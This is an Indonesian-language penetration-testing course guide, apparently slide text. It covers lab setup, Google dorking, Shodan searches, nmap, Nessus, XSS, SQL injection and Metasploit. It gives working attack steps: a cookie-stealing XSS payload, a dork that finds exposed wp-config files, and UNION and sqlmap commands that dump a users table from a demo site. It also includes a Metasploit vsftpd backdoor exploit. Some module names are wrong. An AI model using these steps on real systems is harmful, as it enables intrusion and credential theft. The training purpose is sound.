Cyber Security

Lab Guide Training

Penetration Testing
IDN.ID
Ziad Sobri & Aditya Firman Nugroho

visit now www.idn.id

Aditya Firman Nugroho Ziad Sobri
IDN Trainner IDN Trainner

Contact Information Contact Information

Email : Adityafirmannn21@gmail.com Email : ziadsobri@gmail.com
Telegram : t.me/t.me/dittyaa2 Telegram : t.me/ziadsobri
Certified : MTCSE, Pentest+ Certified : MTCSE, Pentest+,Security+,CySA+,CASP+

www.idn.id
 Modul 1
Setup Environment
Lab Pentest
Prepare Lab
Menginstal software dan OS yang dibutuhkan untuk kebutuhan environment lab
seperti
• Virtual Machine
• VMWARE
• Kali Linux ( https://www.kali.org/downloads/ )
• Metasploitable ( https://sourceforge.net/projects/metasploitable/ )
• Silahkan Akses ( https://s.id/B-Pentest )

www.idn.id 4
Prepare Lab
2

Jika menggunakan virtualbox silahkan memilih menu virtualbox

www.idn.id 5
Prepare Lab

Password default Kali Linux adalah kali:kali

www.idn.id 6
Prepare Lab

www.idn.id 7
Prepare Lab

2
5

3 6

Untuk Range IP tidak harus mengikuti gambar

www.idn.id 8
Prepare Lab

Silahkan melakukan pengganti-an adapter

Network pada Kali Linux dan
Metasploitable2 agar bisa saling terhubung 1

dan coba lakukan command ping ke 2

internet dan satu sama lain

www.idn.id 9
 Modul Lab Guide
Information Gaterhing
Information Gathering
IDN.ID

Information gathering atau mengumpulkan informasi sebanyak banyak-nya tentang

target scope yang akan dijalankan. Ada 2 cara untuk melakukan information
gathering :
• Passive Information
Mengumpulkan informasi tanpa berhubungan langsung dengan target
• Active Information
Mengumpulkan informasi secara langsung dengan target

www.idn.id 11
Modul Lab Guide
Google Hacking
Google Dorking
IDN.ID

Mencari informasi menggunakan search

engine terutama google.

Mencari document
filetype:.doc,.pdf, etc…
Mencari site specific
site:example.com
Mencairi document di site specific
site:example.com filetype:.doc

www.idn.id 13
Using Google Dorking
IDN.ID

Dengan menggunakan google dorking kita

bisa lebih tepat untuk mencari sebuah
informasi-informasi target

filetype:pdf site:idn.id

www.idn.id 14
Mencari inurl “php?sql=select” ext:php
IDN.ID

inurl:"wp-content" intitle:"index.of"
intext:wp-config.php

Disini kita mencari wordpress config

berextesion php dan muncul beberapa
website yang terquery di google

www.idn.id 15
Modul Lab Guide
OSINT
OSINT techniques
IDN.ID

Open-source Intelligence adalah techniques untuk mencari informasi public

yang berkaitan pada target, OSINT adalah salah satu penentu apakah exploit
akan berhasil atau tidak dikarenakan information yang kita kumpulkan pada
techniques ini. Pada tahap ini akan mencari informasi berdasarkan
• Social Media Profile
• Job Posting, Blogs
• Mail Server Records
• Target Website

www.idn.id 17
Search Engine
IDN.ID

Kita juga bisa menggunakan search engine khusus untuk mencari sebuah informasi
penting seperti IP Address, DNS Server, IoT dan banyak lagi menggunakan Tool
dibawah ini :
• Shodan
• Censys
• Zoomeye
• Hunter.io

www.idn.id 18
Shodan for Telnet
IDN.ID

Login shodan dan cari port:23

mikrotik

Dan akan memunculkan mikrotik

yang memiliki port 23

www.idn.id 19
Censys
IDN.ID

Censys mirip seperti shodan hanya

saja lebih complex dan informasi
yang diberikan lebih banyak

www.idn.id 20
Censys for Telnet
IDN.ID

Kita juga bisa mencari menggunakan

cenys hanya saja censys menggunakan
syntax khusus

https://search.censys.io/search/definitions?resource=hosts

www.idn.id 21
Modul Lab Guide
Enumeration DNS
Whois
IDN.ID

• Whois
merupakan query dan protocol respon
yang digunakan untuk query ke database
yang tersimpan dan terdaftar sebagai
resource di internet, seperti nama domain,
blok IP Address
• Kita bisa melakukan command whois di linux
dan juga menggunakan tools seperti
domaintool.com dan the domain dossier

www.idn.id 23
Nslookup
IDN.ID

• nslookup
biasanya digunakan untuk query DNS
server mapping IP Address ke DNS Record
yang biasanya digunakan untuk mencari
informasi berupa ip address dan email yang
terhubung

www.idn.id 24
theharvester
IDN.ID

theHarvester bisa digunakan untuk

mengumpulkan informasi berupa email,
sub-domain, open-port dan banner secara
otomatis yang biasanya bersumber dari
search engine seperti shodan dan censys

www.idn.id 25
Recon-ng
IDN.ID

recon-ng salah satu tools untuk

reconnaissance, unik-nya recon-ng
adalah banyaknya modules,
database dan built-in tools yang
bisa kita pakai untuk mencari
informasi

www.idn.id 26
Modul Lab Guide
Scanning Port
Scanning Port and Service
IDN.ID

Scanning Port dan Service diperlukan

untuk memvalidasi sebuah information
yang dilakukan saat phase information
gathering biasanya memastikan
• Service dan port yang ada
• Vulnerability
• Version
• Banner

www.idn.id 28
Nmap
IDN.ID

Nmap (“Network Mapper”) tool untuk

network discovery dan auditing security
kita bisa menemukan informasi langsung
dengan target menggunakan tool ini dan
biasanya informasinya akurat berdasarkan
cara scanningnya.

www.idn.id 29
Cheatsheet nmap
IDN.ID

www.idn.id 30
LAB NMAP
IDN.ID

• Lakukan Port Scanning pada Target

Metasploitable2
• Mencari OS, Version,
• Service
• Vulnerability

www.idn.id 31
 Modul Lab Guide
Vulnerability Scanning
Nessus
IDN.ID

Nessus biasanya digunakan untuk

Vulnerability Assessment dikarenakan
scanner ini mencangkup hampir semua
scope.

www.idn.id 33
Instailing Nessus
IDN.ID

1. Donwload packet nessus pada https://www.tenable.com/downloads/nessus

2. Sesuaikan packet yang didonwload
3. Lakukan command
dpkg –I <nama-packet>
4. Lakukan register untuk mendapatkan activation code pada website
https://www.tenable.com/products/nessus/nessus-essentials
5. Lakukan commnd
systemctl start nessus
6. Masuk menggunakan browser dengan mengetikan https://x.x.x.x:8834/
7. Masukan license yang didapatkan di email, dan buat akun.

www.idn.id 34
Instailing Nessus
IDN.ID

www.idn.id 35
LAB Nessus
IDN.ID

• Lakukan Vulnerability Scanning pada

Target Metasploitable2
• Mencari CVE,OS,Version
• Service
• Vulnerability
• Reporting

www.idn.id 36
 Modul Lab Guide
Exploit XSS Cross Site
Scripting Stored
Stored XSS
IDN.ID

Pada serangan ini script yang sudah di injection akan tersimpan di server dan akan
tereksekusi saat user masuk kedalam page yang sudah di inject script XSS biasanya
ada pada
• User Forum
• Box Command
• Review
• Etc,..

www.idn.id 38
Stored XSS
IDN.ID

www.idn.id 39
Stored XSS
IDN.ID

Kita akan mencoba memasukan code

pada form submit yang tersedia dengan
code seperti dibawah ini

<h1>stored</h1>

www.idn.id 40
 Modul Lab Guide
Exploit XSS Cross Site
Scripting Reflected
Reflected XSS
IDN.ID

Reflected XSS tidak akan

menyimpad script pada
database tapi akan langsung
muncul hasil dari script yang
diinject seperti error message,
atau respone web server

www.idn.id 42
Reflected XSS
IDN.ID

www.idn.id 43
Reflected XSS
IDN.ID

Kita akan mencoba memasukan code

pada form submit yang tersedia dengan
code seperti dibawah ini

<script>alert(document.cookie)</script>

www.idn.id 44
Modul Lab Guide
SQL Injection
SQL Injection
IDN.ID

SQL Injection adalah keretanan keamanan

web yang memungkinkan attacker
menggangu query yang dibuat aplikasi ke
database. Ini memungkinkan penyerang
untuk melihat data penting pada
database. Ada beberapa Teknik SQL
• SQL Manual
• SQL With SQLMAP

www.idn.id 46
SQL Injection Manual
IDN.ID

1. Masuk ke website http://testphp.vulnweb.com/listproducts.php?cat=1

2. Tambahkan karakter single quote (‘) pada akhir url untuk mengetahui vuln atau tidak. Contoh
http://testphp.vulnweb.com/listproducts.php?cat=1’ biasanya muncul QUERY SQL Error atau
tampilan website berubah
3. Sekarang kita akan mencari dan menghitung jumlah table yang ada menggunakan perintah ORDER
BY
http://testphp.vulnweb.com/listproducts.php?cat=1+order+by+1+--+
Lakukan hal yang sama berulah, jika tampilan web menjadi error maka jumlah table
tidak melebihi angka tersebut
4. Jika sudah mendapatkan jumlah dari table maka urutkan angka-nya seperti ini
http://testphp.vulnweb.com/listproducts.php?cat=1 +union+select+1,2,3..10+--+ maka akan
muncul angka pada tampilan website
5. Setelah menemukan angka tersebut maka exploit dengan command yang sebelumnya

www.idn.id 47
SQL Injection with SQLMAP
IDN.ID

1. Target http://testphp.vulnweb.com/listproducts.php?cat=1
2. Jalankan tools sqlmap dengan command
sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” –dbs
3. Terlihat beberapa database, explore database “acuart” dengan command
sqlmap –u “http://testphp.vulnweb.com/listproducts.php?cat=1” -D acuart –
tables
Terlihat muncul beberapa informasi, yang paling menarik adalah informasi dari “users”,
exploit menggunakan tools sqlmap
4. Lakukan lah command sqlmap –u
“http://testphp.vulnweb.com/listproducts.php?cat=1” -D acuart –T users –dump

www.idn.id 48
Modul Lab Guide
Wordlist
Crouch
IDN.ID

Crunch adalah wordlist generator

yang mana kita bisa spesifikasikan
standar karakter dari yang akan kita
buat wordlist. wordlist ini dibuat
dari kombinasi charakter yang kita
spesifikasi kan dan juga bisa kita
spesifikasi size dari file

www.idn.id 50
CeWL
IDN.ID

CeWL ( Custom World List generator

) adalah ruby app yang berfungsi
membuat sebuah wordlist dari url
yang kita spesifikasikan. wordlist ini
akan berisikan kata,kalimat yang ada
pada url yang dijadikan target
wordlist

www.idn.id 51
Modul Lab Guide
Password Attack
Hydra
IDN.ID

Hydra adalah tools untuk mendapatkan akses ke

system dengan cara login user dan password
secara otomatis, kita bisa menggunakan wordlist
untuk memudahkan menebak user dan
passwordnya. hydra sendiri bisa dipakai attacker
untuk gain access ke service seperti
SSH,FTP,SBM.Telnet Dan masi banyak lagi
dibawah ini kita mencoba untuk melakukan
attack dictonary attack

www.idn.id 53
Modul Lab Guide
Metasploit
metasploit
IDN.ID

Metasploit adalah framework

penetration testing yang digunakan
untuk exploit vulnerability secara
otomatis, metasploitable
menggunakan beberapa modul yang
ada pada database rapid7

www.idn.id 55
ftp vulnerability
IDN.ID

1. Menggunakan tool mfsconsole

2. Masukan command mfsconsole dan cari exploit untuk vstpd, dan ternyata hanya
satu yaitu vsftpd_234_backdoor
3. Masukan command use exploit/unix/ftp/vsftpd_234_backdoor
4. Set RHOST ke IP Target
5. exploit

www.idn.id 56
samba vulnerability
IDN.ID

1. Menggunakan tool mfsconsole

2. Masukan command mfsconsole dan cari exploit untuk smb, dan ternyata hanya satu
yaitu smb_version
3. Masukan command use exploit/unix/smb/smb_version
4. Set RHOST ke IP Target
5. exploit

www.idn.id 57